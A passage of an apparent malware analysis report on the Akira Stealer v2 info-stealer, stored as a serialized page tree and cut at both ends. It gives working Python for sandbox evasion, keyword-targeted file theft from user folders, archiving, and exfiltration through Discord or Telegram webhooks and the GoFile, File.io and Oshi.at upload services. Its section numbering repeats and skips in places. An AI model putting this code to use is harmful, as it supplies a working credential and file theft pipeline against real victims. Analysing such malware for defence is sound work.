",[3724,22558,17927],{}," to detect virtualization or analysis environments:",[3102,22561,22563],{"className":17754,"code":22562,"language":17756,"meta":402,"style":402},"if VmProtect.isVM(1):\n    sys.exit()\n",[3724,22564,22565,22570],{"__ignoreMap":402},[7258,22566,22567],{"class":14951,"line":14952},[7258,22568,22569],{},"if VmProtect.isVM(1):\n",[7258,22571,22572],{"class":14951,"line":403},[7258,22573,22574],{},"    sys.exit()\n",[353,22576,22577],{},"Key checks include:",[367,22579,22580,22586,22592,22598],{},[370,22581,22582,22585],{},[433,22583,22584],{},"Registry Keys & Driver Descriptors",": Queries virtualization-related registry entries.",[370,22587,22588,22591],{},[433,22589,22590],{},"Blacklisted UUIDs & Computer Names",": Matches against known VM fingerprints.",[370,22593,22594,22597],{},[433,22595,22596],{},"HTTP Simulation",": Attempts to connect to a nonexistent domain under HTTPS.",[370,22599,22600,22603,22604,2454,22607,2454,22610,456],{},[433,22601,22602],{},"Process Blacklist",": Spawns a background thread to kill tools like ",[3724,22605,22606],{},"wireshark",[3724,22608,22609],{},"ollydbg",[3724,22611,22612],{},"ida64",[629,22614,22616],{"id":22615},"_7104-packaging-transmission","7.10.4 Packaging & Transmission",[353,22618,14147],{},[353,22620,22621,22622,22625],{},"The collected ",[3724,22623,22624],{},"system_info",", IP, and country flag are embedded in the webhook payload headers:",[3102,22627,22629],{"className":17754,"code":22628,"language":17756,"meta":402,"style":402},"webhook_payload = {\n    \"embeds\": [{\n        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n        \"fields\": [...]\n    }]\n}\nrequests.post(self.webhook_url, json=webhook_payload)\n",[3724,22630,22631,22636,22641,22646,22651,22656,22661,22665],{"__ignoreMap":402},[7258,22632,22633],{"class":14951,"line":14952},[7258,22634,22635],{},"webhook_payload = {\n",[7258,22637,22638],{"class":14951,"line":403},[7258,22639,22640],{},"    \"embeds\": [{\n",[7258,22642,22643],{"class":14951,"line":704},[7258,22644,22645],{},"        \"title\": f\"💉 Infected {self.computerName}/{self.username} | {self.ip} {flag}\",\n",[7258,22647,22648],{"class":14951,"line":15337},[7258,22649,22650],{},"        \"description\": description + \"\\n```⚙️ System Info\\n\" + self.system_info + \"```\",\n",[7258,22652,22653],{"class":14951,"line":13492},[7258,22654,22655],{},"        \"fields\": [...]\n",[7258,22657,22658],{"class":14951,"line":15666},[7258,22659,22660],{},"    }]\n",[7258,22662,22663],{"class":14951,"line":13493},[7258,22664,15669],{},[7258,22666,22667],{"class":14951,"line":17117},[7258,22668,22669],{},"requests.post(self.webhook_url, json=webhook_payload)\n",[367,22671,22672,22678],{},[370,22673,22674,22677],{},[433,22675,22676],{},"Flag Emoji",": Derived from ISO country code.",[370,22679,22680,22683],{},[433,22681,22682],{},"Fields",": Include counts of stolen passwords, cookies, etc., but the system info is in the embed description for immediate context.",[353,22685,22686,22689],{},[433,22687,22688],{},"Summary:","\nSystem profiling in Akira Stealer v2 gathers comprehensive host and network data via WMI commands, environment variables, and IP geolocation. Coupled with VM detection and tool-killing routines, this ensures the attacker has a full snapshot of the compromised environment, enhancing targeted follow-up actions and filtering out analysis sandboxes.",[2548,22691,22693,22694,8133],{"id":22692},"_711-file-grabber-class-utilssteal_files","7.11 File Grabber (Class: ",[3724,22695,22696],{},"Utils.steal_files",[353,22698,10713],{},[353,22700,22701],{},"Beyond browser data and tokens, Akira also attempts to extract valuable user-generated content—such as documents, spreadsheets, private notes, and cryptographic key files. The File Grabber module is responsible for this task. It operates by scanning high-value directories for common file types and patterns, then silently adding them to the exfiltration bundle. What makes this module especially dangerous is its simplicity and focus: it doesn’t attempt to crawl the entire file system. Instead, it targets specific, high-probability locations where sensitive files are typically stored. These include the Desktop, Documents, Downloads, and OneDrive directories—each relative to the user's home path. This focused approach improves both speed and stealth, reducing the likelihood of detection during the scan. It also avoids alerting the user by not accessing system or protected directories. Once files of interest are located, they are copied into a temporary folder, optionally renamed or grouped, and later compressed into the final ZIP archive that’s uploaded in the exfiltration phase.",[629,22703,22705],{"id":22704},"_7111-target-directories-enumeration","7.11.1 Target Directories Enumeration",[353,22707,14147],{},[353,22709,22710],{},"The stealer focuses on four high-yield folders:",[3102,22712,22714],{"className":17754,"code":22713,"language":17756,"meta":402,"style":402},"searchFolders = [\n    \"Desktop\",\n    \"Documents\",\n    \"Downloads\",\n    \"OneDrive\"\n]\n",[3724,22715,22716,22721,22726,22731,22736,22741],{"__ignoreMap":402},[7258,22717,22718],{"class":14951,"line":14952},[7258,22719,22720],{},"searchFolders = [\n",[7258,22722,22723],{"class":14951,"line":403},[7258,22724,22725],{},"    \"Desktop\",\n",[7258,22727,22728],{"class":14951,"line":704},[7258,22729,22730],{},"    \"Documents\",\n",[7258,22732,22733],{"class":14951,"line":15337},[7258,22734,22735],{},"    \"Downloads\",\n",[7258,22737,22738],{"class":14951,"line":13492},[7258,22739,22740],{},"    \"OneDrive\"\n",[7258,22742,22743],{"class":14951,"line":15666},[7258,22744,21184],{},[353,22746,22747],{},"Each folder is interpreted relative to the victim’s home directory:",[3102,22749,22751],{"className":17754,"code":22750,"language":17756,"meta":402,"style":402},"for folder in searchFolders:\n    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n    if os.path.exists(current_path):\n        # proceed to scan\n",[3724,22752,22753,22758,22763,22768],{"__ignoreMap":402},[7258,22754,22755],{"class":14951,"line":14952},[7258,22756,22757],{},"for folder in searchFolders:\n",[7258,22759,22760],{"class":14951,"line":403},[7258,22761,22762],{},"    current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[7258,22764,22765],{"class":14951,"line":704},[7258,22766,22767],{},"    if os.path.exists(current_path):\n",[7258,22769,22770],{"class":14951,"line":15337},[7258,22771,22772],{},"        # proceed to scan\n",[629,22774,22776],{"id":22775},"_7112-keyword-extension-filtering","7.11.2 Keyword & Extension Filtering",[353,22778,14147],{},[353,22780,22781],{},[433,22782,22783],{},"Keyword List",[353,22785,22786],{},"A predefined set of substrings guides file selection. Only filenames containing at least one keyword are considered:",[3102,22788,22790],{"className":17754,"code":22789,"language":17756,"meta":402,"style":402},"keywordsFiles = [\n    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n]\n",[3724,22791,22792,22797,22802,22807],{"__ignoreMap":402},[7258,22793,22794],{"class":14951,"line":14952},[7258,22795,22796],{},"keywordsFiles = [\n",[7258,22798,22799],{"class":14951,"line":403},[7258,22800,22801],{},"    \"passw\", \"seed\", \"mnemo\", \"phrase\", \"login\", \"wallet\",\n",[7258,22803,22804],{"class":14951,"line":704},[7258,22805,22806],{},"    \"crypto\", \"token\", \"backup\", \"secret\", \"account\"\n",[7258,22808,22809],{"class":14951,"line":15337},[7258,22810,21184],{},[367,22812,22813,22829],{},[370,22814,22815,22818,22819,22822,22823,13854,22826,456],{},[433,22816,22817],{},"Partial Matches",": Keywords like ",[3724,22820,22821],{},"passw"," capture both ",[3724,22824,22825],{},"passwords.txt",[3724,22827,22828],{},"passw_backup.docx",[370,22830,22831,22834],{},[433,22832,22833],{},"Broad Coverage",": Encompasses authentication, wallet, crypto, and token-related terms.",[629,22836,22838],{"id":22837},"_7113-allowed-file-types","7.11.3 Allowed File Types",[353,22840,14147],{},[353,22842,22843],{},"To minimize noise, a whitelist of extensions is enforced:",[3102,22845,22847],{"className":17754,"code":22846,"language":17756,"meta":402,"style":402},"allowed_extensions = [\n    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n    \".jpg\", \".png\"\n]\n",[3724,22848,22849,22854,22859,22864],{"__ignoreMap":402},[7258,22850,22851],{"class":14951,"line":14952},[7258,22852,22853],{},"allowed_extensions = [\n",[7258,22855,22856],{"class":14951,"line":403},[7258,22857,22858],{},"    \".txt\", \".doc\", \".docx\", \".pdf\", \".csv\", \".xls\", \".xlsx\",\n",[7258,22860,22861],{"class":14951,"line":704},[7258,22862,22863],{},"    \".jpg\", \".png\"\n",[7258,22865,22866],{"class":14951,"line":15337},[7258,22867,21184],{},[629,22869,22871],{"id":22870},"_7113-size-constraint","7.11.3 Size Constraint",[353,22873,14147],{},[353,22875,22876],{},"Files larger than 2 megabytes are skipped to optimize exfiltration speed and avoid large transfers:",[3102,22878,22880],{"className":17754,"code":22879,"language":17756,"meta":402,"style":402},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\nif file_size_mb \u003C= 2:\n    # eligible for copy\n",[3724,22881,22882,22887,22892],{"__ignoreMap":402},[7258,22883,22884],{"class":14951,"line":14952},[7258,22885,22886],{},"file_size_mb = os.path.getsize(full_path) / (1024 * 1024)\n",[7258,22888,22889],{"class":14951,"line":403},[7258,22890,22891],{},"if file_size_mb \u003C= 2:\n",[7258,22893,22894],{"class":14951,"line":704},[7258,22895,22896],{},"    # eligible for copy\n",[629,22898,22900],{"id":22899},"_7114-recursive-scanning-copy-logic","7.11.4 Recursive Scanning & Copy Logic",[353,22902,14147],{},[353,22904,22905],{},"Once the high-value directories have been identified, Akira initiates a recursive scanning routine to traverse subfolders and locate files matching specific keywords and extensions. This phase is built for precision and stealth: only files that match pre-defined criteria—such as filenames containing sensitive keywords and approved filetypes—are considered. The logic ensures that only relevant, user-generated content is exfiltrated. It ignores system files, caches, and binaries, and limits the size of any single file to 2 MB to reduce upload size and detection risk. This scanning method is silent, efficient, and optimized for stealthy data theft in real-world environments. By copying matching files into a staging folder and maintaining a list of what was taken, Akira prepares the content for bundling and exfiltration—while minimizing duplication and operational noise.",[353,22907,22908,22909,22912],{},"The core routine ",[3724,22910,22911],{},"steal_files()"," operates as follows:",[3102,22914,22916],{"className":17754,"code":22915,"language":17756,"meta":402,"style":402},"@staticmethod\ndef steal_files():\n    stolen_files = set()\n    temp_folder = Utils.get_temp_folder()\n\n    for folder in searchFolders:\n        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n        if os.path.exists(current_path):\n            for root, _, files in os.walk(current_path):\n                for file in files:\n                    lower = file.lower()\n                    # Keyword check\n                    if any(keyword in lower for keyword in keywordsFiles):\n                        ext = os.path.splitext(lower)[1]\n                        # Extension and size check\n                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n                            # Prepare destination\n                            files_dir = os.path.join(temp_folder, \"Files\")\n                            os.makedirs(files_dir, exist_ok=True)\n                            shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n                            stolen_files.add(file)\n    data.stolen_files.extend(stolen_files)\n",[3724,22917,22918,22922,22927,22932,22937,22941,22946,22951,22956,22961,22966,22971,22976,22981,22986,22991,22996,23001,23006,23011,23016,23021],{"__ignoreMap":402},[7258,22919,22920],{"class":14951,"line":14952},[7258,22921,18242],{},[7258,22923,22924],{"class":14951,"line":403},[7258,22925,22926],{},"def steal_files():\n",[7258,22928,22929],{"class":14951,"line":704},[7258,22930,22931],{},"    stolen_files = set()\n",[7258,22933,22934],{"class":14951,"line":15337},[7258,22935,22936],{},"    temp_folder = Utils.get_temp_folder()\n",[7258,22938,22939],{"class":14951,"line":13492},[7258,22940,17114],{"emptyLinePlaceholder":415},[7258,22942,22943],{"class":14951,"line":15666},[7258,22944,22945],{},"    for folder in searchFolders:\n",[7258,22947,22948],{"class":14951,"line":13493},[7258,22949,22950],{},"        current_path = os.path.join(os.environ['USERPROFILE'], folder)\n",[7258,22952,22953],{"class":14951,"line":17117},[7258,22954,22955],{},"        if os.path.exists(current_path):\n",[7258,22957,22958],{"class":14951,"line":17123},[7258,22959,22960],{},"            for root, _, files in os.walk(current_path):\n",[7258,22962,22963],{"class":14951,"line":17369},[7258,22964,22965],{},"                for file in files:\n",[7258,22967,22968],{"class":14951,"line":18290},[7258,22969,22970],{},"                    lower = file.lower()\n",[7258,22972,22973],{"class":14951,"line":18296},[7258,22974,22975],{},"                    # Keyword check\n",[7258,22977,22978],{"class":14951,"line":18302},[7258,22979,22980],{},"                    if any(keyword in lower for keyword in keywordsFiles):\n",[7258,22982,22983],{"class":14951,"line":18308},[7258,22984,22985],{},"                        ext = os.path.splitext(lower)[1]\n",[7258,22987,22988],{"class":14951,"line":18314},[7258,22989,22990],{},"                        # Extension and size check\n",[7258,22992,22993],{"class":14951,"line":18320},[7258,22994,22995],{},"                        if ext in allowed_extensions and os.path.getsize(os.path.join(root, file)) \u003C= 2 * 1024 * 1024:\n",[7258,22997,22998],{"class":14951,"line":18326},[7258,22999,23000],{},"                            # Prepare destination\n",[7258,23002,23003],{"class":14951,"line":18332},[7258,23004,23005],{},"                            files_dir = os.path.join(temp_folder, \"Files\")\n",[7258,23007,23008],{"class":14951,"line":18338},[7258,23009,23010],{},"                            os.makedirs(files_dir, exist_ok=True)\n",[7258,23012,23013],{"class":14951,"line":18344},[7258,23014,23015],{},"                            shutil.copy(os.path.join(root, file), os.path.join(files_dir, file))\n",[7258,23017,23018],{"class":14951,"line":18350},[7258,23019,23020],{},"                            stolen_files.add(file)\n",[7258,23022,23023],{"class":14951,"line":18356},[7258,23024,23025],{},"    data.stolen_files.extend(stolen_files)\n",[353,23027,23028],{},[433,23029,23030],{},"Key points:",[5026,23032,23033,23041,23050,23059,23065],{},[370,23034,23035,23040],{},[433,23036,23037],{},[3724,23038,23039],{},"os.walk",": Recursively descends into subdirectories.",[370,23042,23043,23046,23047,456],{},[433,23044,23045],{},"Case-insensitive matching",": Filenames are normalized via ",[3724,23048,23049],{},"lower()",[370,23051,23052,23055,23056,23058],{},[433,23053,23054],{},"Atomic copy",": Uses ",[3724,23057,21050],{}," to preserve file content.",[370,23060,23061,23064],{},[433,23062,23063],{},"Set of stolen filenames",": Prevents duplicate copies when the same file appears twice.",[370,23066,23067,14252,23072,23075],{},[433,23068,23069,23070],{},"Integration with ",[3724,23071,22328],{},[3724,23073,23074],{},"data.stolen_files"," accumulates the stolen file list for later reporting.",[629,23077,23079],{"id":23078},"_7115-archiving-and-exfiltration","7.11.5 Archiving and Exfiltration",[353,23081,14147],{},[353,23083,23084,23085,23087],{},"After collection, the ",[3724,23086,21532],{}," folder is zipped and dispatched:",[3102,23089,23091],{"className":17754,"code":23090,"language":17756,"meta":402,"style":402},"# Archive\nUtils.zip_client_file()  # creates CLIENT.zip from temp_folder\n\n# Upload & Notify\nakira.sendFilesTG(Utils.get_temp_folder(), startup)\nhook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[3724,23092,23093,23098,23103,23107,23112,23117],{"__ignoreMap":402},[7258,23094,23095],{"class":14951,"line":14952},[7258,23096,23097],{},"# Archive\n",[7258,23099,23100],{"class":14951,"line":403},[7258,23101,23102],{},"Utils.zip_client_file()  # creates CLIENT.zip from temp_folder\n",[7258,23104,23105],{"class":14951,"line":704},[7258,23106,17114],{"emptyLinePlaceholder":415},[7258,23108,23109],{"class":14951,"line":15337},[7258,23110,23111],{},"# Upload & Notify\n",[7258,23113,23114],{"class":14951,"line":13492},[7258,23115,23116],{},"akira.sendFilesTG(Utils.get_temp_folder(), startup)\n",[7258,23118,23119],{"class":14951,"line":15666},[7258,23120,23121],{},"hook.sendFilesTG(Utils.get_temp_folder(), startup)\n",[367,23123,23124,23139],{},[370,23125,23126,23131,23132,2454,23134,2454,23136,17155],{},[433,23127,23128],{},[3724,23129,23130],{},"zip_client_file()",": Compresses the entire temp directory, including ",[3724,23133,21532],{},[3724,23135,19585],{},[3724,23137,23138],{},"Passwords",[370,23140,23141,23145,23146],{},[433,23142,23143],{},[3724,23144,22309],{},": Posts the download link via Telegram or Discord webhook, listing each stolen filename:",[3102,23147,23149],{"className":17754,"code":23148,"language":17756,"meta":402,"style":402},"fields.append({\n\"name\": \"📂 Files\",\n\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n\"inline\": False\n})\n",[3724,23150,23151,23156,23161,23166,23171],{"__ignoreMap":402},[7258,23152,23153],{"class":14951,"line":14952},[7258,23154,23155],{},"fields.append({\n",[7258,23157,23158],{"class":14951,"line":403},[7258,23159,23160],{},"\"name\": \"📂 Files\",\n",[7258,23162,23163],{"class":14951,"line":704},[7258,23164,23165],{},"\"value\": \"`\" + \"\\n\".join(data.stolen_files) + \"`\",\n",[7258,23167,23168],{"class":14951,"line":15337},[7258,23169,23170],{},"\"inline\": False\n",[7258,23172,23173],{"class":14951,"line":13492},[7258,23174,23175],{},"})\n",[353,23177,23178],{},[433,23179,23180],{},"Conclusion:",[353,23182,23183],{},"The File Grabber in Akira Stealer v2 systematically hunts for sensitive documents using keyword and extension filters, respects a 2 MB size cap for efficiency, and consolidates stolen items into an archive. Its design ensures both breadth (multiple folders) and precision (targeted filters), making it one of the most impactful stages of the malware’s lifecycle.",[2548,23185,23187],{"id":23186},"_712-exfiltration-strategy","7.12 Exfiltration Strategy",[353,23189,10713],{},[353,23191,23192],{},"The exfiltration module handles harvested tokens and additional artifacts (cookies, autofills, logs) by staging them in a structured directory, compressing into an archive, uploading to multiple online file hosts, and sending detailed webhook notifications. This section deconstructs each step with file paths, domain endpoints, and code references for full traceability.",[629,23194,23196],{"id":23195},"_7121-directory-layout-filenames","7.12.1 Directory Layout & Filenames",[353,23198,14147],{},[353,23200,23201],{},"Akira organizes all collected artifacts into a clean and hierarchical temporary directory structure. This design allows for efficient packaging and easy post-exfiltration review by the attacker. Each data category—such as Tokens, Cookies, Passwords, or Screenshots—is stored in its own subfolder under a root path named after the victim’s computer (e.g., DESKTOP1234). This structured layout ensures clarity, minimizes duplication, and streamlines the archiving and upload process. It also makes automated parsing or manual inspection much easier on the attacker side.",[3102,23203,23206],{"className":23204,"code":23205,"language":3722},[3720],"C:\\Users\\User\\AppData\\Local\\Temp\\DESKTOP1234\\\n├─ Tokens\\\n│   ├ token_ab12cd34.txt\n│   └ token_ef56gh78.txt\n├─ Cookies\\\n│   ├ Chrome_Cookies.txt\n│   └ Discord_Cookies.txt\n├─ Autofill\\\n├─ Passwords\\\n├─ Logs\\\n└─ Screenshots\\\n",[3724,23207,23205],{"__ignoreMap":402},[629,23209,23211],{"id":23210},"_7122-token-artifact-staging","7.12.2 Token & Artifact Staging",[353,23213,14147],{},[353,23215,23216],{},"Before exfiltration, Akira stages all relevant artifacts in the corresponding subfolders. Token values, for instance, are written into individual .txt files to facilitate quick scanning and validation. Cookies, autofill entries, and passwords are similarly written into structured text files named by browser. This step standardizes the data layout, enabling automated tooling to track what was harvested. It also ensures that the zip archive later reflects a predictable and attacker-friendly format, regardless of which modules were triggered.",[3102,23218,23220],{"className":17754,"code":23219,"language":17756,"meta":402,"style":402},"import os, shutil\n# Constants\nTMP = os.getenv('TEMP')\nROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n# Prepare structure\nfor sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n# Save token\nwith open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n    f.write(token)\n",[3724,23221,23222,23227,23232,23237,23242,23247,23252,23257,23262,23267],{"__ignoreMap":402},[7258,23223,23224],{"class":14951,"line":14952},[7258,23225,23226],{},"import os, shutil\n",[7258,23228,23229],{"class":14951,"line":403},[7258,23230,23231],{},"# Constants\n",[7258,23233,23234],{"class":14951,"line":704},[7258,23235,23236],{},"TMP = os.getenv('TEMP')\n",[7258,23238,23239],{"class":14951,"line":15337},[7258,23240,23241],{},"ROOT = os.path.join(TMP, os.getenv('COMPUTERNAME'))\n",[7258,23243,23244],{"class":14951,"line":13492},[7258,23245,23246],{},"# Prepare structure\n",[7258,23248,23249],{"class":14951,"line":15666},[7258,23250,23251],{},"for sub in ['Tokens','Cookies','Autofill','Passwords','Logs','Screenshots']:\n",[7258,23253,23254],{"class":14951,"line":13493},[7258,23255,23256],{},"    os.makedirs(os.path.join(ROOT, sub), exist_ok=True)\n",[7258,23258,23259],{"class":14951,"line":17117},[7258,23260,23261],{},"# Save token\n",[7258,23263,23264],{"class":14951,"line":17123},[7258,23265,23266],{},"with open(os.path.join(ROOT, 'Tokens', f'token_{token[:8]}.txt'), 'w') as f:\n",[7258,23268,23269],{"class":14951,"line":17369},[7258,23270,23271],{},"    f.write(token)\n",[367,23273,23274,23277],{},[370,23275,23276],{},"Tokens saved in separate small text files for quick inspection.",[370,23278,23279,23280,23283,23284,456],{},"Cookie dumps from ",[3724,23281,23282],{},"Chromium.GetCookies()"," written to ",[3724,23285,23286],{},"{Browser}_Cookies.txt",[629,23288,23290],{"id":23289},"_7133-zip-archive-creation","7.13.3 ZIP Archive Creation",[353,23292,14147],{},[353,23294,23295,23296],{},"Once staging is complete, Akira compresses the entire directory into a single ZIP archive. The archive filename follows a consistent naming convention: ",[23297,23298,23299,23300],"computer-name",{},"_",[23301,23302,23303],"timestamp",{},".zip, using the host’s machine name and a UTC timestamp in ISO 8601 format. This ensures both uniqueness and chronological traceability. By walking the entire staging directory recursively, every file is preserved in its relative structure within the ZIP. This format simplifies bulk retrieval and inspection by attackers, especially if hundreds of victims are compromised in parallel.",[3102,23305,23307],{"className":17754,"code":23306,"language":17756,"meta":402,"style":402},"import zipfile, datetime\n\ndef create_archive(root_dir: str) -> str:\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n        for dirpath, _, files in os.walk(root_dir):\n            for fname in files:\n                full = os.path.join(dirpath, fname)\n                rel = os.path.relpath(full, root_dir)\n                zf.write(full, rel)\n    return zip_path\n",[3724,23308,23309,23314,23318,23323,23328,23333,23338,23343,23348,23353,23358,23363,23368],{"__ignoreMap":402},[7258,23310,23311],{"class":14951,"line":14952},[7258,23312,23313],{},"import zipfile, datetime\n",[7258,23315,23316],{"class":14951,"line":403},[7258,23317,17114],{"emptyLinePlaceholder":415},[7258,23319,23320],{"class":14951,"line":704},[7258,23321,23322],{},"def create_archive(root_dir: str) -> str:\n",[7258,23324,23325],{"class":14951,"line":15337},[7258,23326,23327],{},"    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n",[7258,23329,23330],{"class":14951,"line":13492},[7258,23331,23332],{},"    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n",[7258,23334,23335],{"class":14951,"line":15666},[7258,23336,23337],{},"    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n",[7258,23339,23340],{"class":14951,"line":13493},[7258,23341,23342],{},"    with zipfile.ZipFile(zip_path, 'w', zipfile.ZIP_DEFLATED) as zf:\n",[7258,23344,23345],{"class":14951,"line":17117},[7258,23346,23347],{},"        for dirpath, _, files in os.walk(root_dir):\n",[7258,23349,23350],{"class":14951,"line":17123},[7258,23351,23352],{},"            for fname in files:\n",[7258,23354,23355],{"class":14951,"line":17369},[7258,23356,23357],{},"                full = os.path.join(dirpath, fname)\n",[7258,23359,23360],{"class":14951,"line":18290},[7258,23361,23362],{},"                rel = os.path.relpath(full, root_dir)\n",[7258,23364,23365],{"class":14951,"line":18296},[7258,23366,23367],{},"                zf.write(full, rel)\n",[7258,23369,23370],{"class":14951,"line":18302},[7258,23371,23372],{},"    return zip_path\n",[367,23374,23375],{},[370,23376,23377,23378,23381],{},"Archive named ",[3724,23379,23380],{},"DESKTOP1234_20250505T123456Z.zip"," for host coherence.",[353,23383,23384],{},[433,23385,23386],{},"ZIP Filename Convention",[353,23388,23389],{},"The archive is named using the compromised host’s computer name followed by a UTC timestamp in ISO format, ensuring uniqueness and chronological order.",[3102,23391,23393],{"className":17754,"code":23392,"language":17756,"meta":402,"style":402},"import datetime, os\n\ndef create_archive(root_dir: str) -> str:\n    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n    ts = datetime.datetime.utcnow().strftime('%Y%m%dT%H%M%SZ')\n    # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n    zip_name = os.path.basename(root_dir) + f'_{ts}.zip'\n    zip_path = os.path.join(os.path.dirname(root_dir), zip_name)\n    return zip_path\n",[3724,23394,23395,23400,23404,23408,23413,23417,23422,23426,23430],{"__ignoreMap":402},[7258,23396,23397],{"class":14951,"line":14952},[7258,23398,23399],{},"import datetime, os\n",[7258,23401,23402],{"class":14951,"line":403},[7258,23403,17114],{"emptyLinePlaceholder":415},[7258,23405,23406],{"class":14951,"line":704},[7258,23407,23322],{},[7258,23409,23410],{"class":14951,"line":15337},[7258,23411,23412],{},"    # Generate UTC timestamp in YYYYMMDDThhmmssZ format\n",[7258,23414,23415],{"class":14951,"line":13492},[7258,23416,23327],{},[7258,23418,23419],{"class":14951,"line":15666},[7258,23420,23421],{},"    # Construct ZIP filename: \u003CComputerName>_\u003CTimestamp>.zip\n",[7258,23423,23424],{"class":14951,"line":13493},[7258,23425,23332],{},[7258,23427,23428],{"class":14951,"line":17117},[7258,23429,23337],{},[7258,23431,23432],{"class":14951,"line":17123},[7258,23433,23372],{},[353,23435,23389],{},[629,23437,23439],{"id":23438},"_7144-upload-workflow","7.14.4 Upload Workflow",[353,23441,14147],{},[353,23443,23444],{},"Akira uses a three-tier upload strategy to maximize the chance of successful data exfiltration. It first attempts to upload the archive to GoFile.io using their public API, which returns a download link. If GoFile is unavailable or blocked, it falls back to File.io and then Oshi.at, ensuring the data is always transferred. These services provide anonymous, short-lived hosting, which makes takedown and traceability difficult. The script captures the final download URL and prepares it for webhook delivery.",[5026,23446,23447,23479,23505],{},[370,23448,23449,23452],{},[433,23450,23451],{},"Primary: GoFile.io",[367,23453,23454,23462,23470],{},[370,23455,23456,14252,23459],{},[433,23457,23458],{},"API to fetch servers",[3724,23460,23461],{},"GET https://api.gofile.io/servers",[370,23463,23464,14252,23467],{},[433,23465,23466],{},"Upload endpoint",[3724,23468,23469],{},"POST https://\u003Cserver>.gofile.io/contents/uploadfile",[370,23471,23472,14252,23475,23478],{},[433,23473,23474],{},"Response field",[3724,23476,23477],{},"data.downloadPage"," contains final URL.",[370,23480,23481,23484],{},[433,23482,23483],{},"Fallback #1: File.io",[367,23485,23486,23496],{},[370,23487,23488,14252,23490,14535,23493],{},[433,23489,23466],{},[3724,23491,23492],{},"POST https://file.io/",[3724,23494,23495],{},"files={'file': open(...)}",[370,23497,23498,23501,23502,23504],{},[433,23499,23500],{},"Response",": JSON ",[3724,23503,11749],{}," field.",[370,23506,23507,23510],{},[433,23508,23509],{},"Fallback #2: Oshi.at",[367,23511,23512,23526],{},[370,23513,23514,14252,23516,14535,23519,23522,23523,456],{},[433,23515,23466],{},[3724,23517,23518],{},"POST http://oshi.at/",[3724,23520,23521],{},"files[]"," and parameters ",[3724,23524,23525],{},"expire=43200, autodestroy=0",[370,23527,23528,23530,23531,456],{},[433,23529,23500],{},": Plain text containing ",[3724,23532,23533],{},"DL: \u003Curl>",[353,23535,23536],{},[433,23537,23538],{},"Implementation Snippet:",[3102,23540,23542],{"className":17754,"code":23541,"language":17756,"meta":402,"style":402},"import requests\n\ndef upload_with_fallback(zip_path):\n    # GoFile\n    try:\n        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n        for srv in servers:\n            try:\n                r = requests.post(\n                    f'https://{srv}.gofile.io/contents/uploadfile',\n                    files={'file': open(zip_path,'rb')}, timeout=20)\n                url = r.json()['data']['downloadPage']\n                if url: return url\n            except: continue\n    except: pass\n    # File.io\n    try:\n        r = requests.post('https://file.io/', files={'file': open(zip_path,'rb')}, timeout=20)\n        return r.json().get('link','')\n    except: pass\n    # Oshi.at\n    try:\n        text = requests.post('http://oshi.at/', files={'files[]': open(zip_path,'rb')}, data={'expire':'43200'}).text\n        return text.split('DL: ')[1].strip()\n    except: pass\n    return ''\n",[3724,23543,23544,23549,23553,23558,23563,23567,23572,23577,23582,23587,23592,23597,23602,23607,23612,23617,23622,23626,23631,23636,23640,23645,23649,23654,23659,23663],{"__ignoreMap":402},[7258,23545,23546],{"class":14951,"line":14952},[7258,23547,23548],{},"import requests\n",[7258,23550,23551],{"class":14951,"line":403},[7258,23552,17114],{"emptyLinePlaceholder":415},[7258,23554,23555],{"class":14951,"line":704},[7258,23556,23557],{},"def upload_with_fallback(zip_path):\n",[7258,23559,23560],{"class":14951,"line":15337},[7258,23561,23562],{},"    # GoFile\n",[7258,23564,23565],{"class":14951,"line":13492},[7258,23566,18405],{},[7258,23568,23569],{"class":14951,"line":15666},[7258,23570,23571],{},"        servers = requests.get('https://api.gofile.io/servers', timeout=10).json()['data']['servers']\n",[7258,23573,23574],{"class":14951,"line":13493},[7258,23575,23576],{},"        for srv in servers:\n",[7258,23578,23579],{"class":14951,"line":17117},[7258,23580,23581],{},"            try:\n",[7258,23583,23584],{"class":14951,"line":17123},[7258,23585,23586],{},"                r = requests.post(\n",[7258,23588,23589],{"class":14951,"line":17369},[7258,23590,23591],{},"                    f'https://{srv}.gofile.io/contents/uploadfile',\n",[7258,23593,23594],{"class":14951,"line":18290},[7258,23595,23596],{},"                    files={'file': open(zip_path,'rb')}, timeout=20)\n",[7258,23598,23599],{"class":14951,"line":18296},[7258,23600,23601],{},"                url = r.json()['data']['downloadPage']\n",[7258,23603,23604],{"class":14951,"line":18302},[7258,23605,23606],{},"                if url: return url\n",[7258,23608,23609],{"class":14951,"line":18308},[7258,23610,23611],{},"            except: continue\n",[7258,23613,23614],{"class":14951,"line":18314},[7258,23615,23616],{},"    except: pass\n",[7258,23618,23619],{"class":14951,"line":18320},[7258,23620,23621],{},"    # 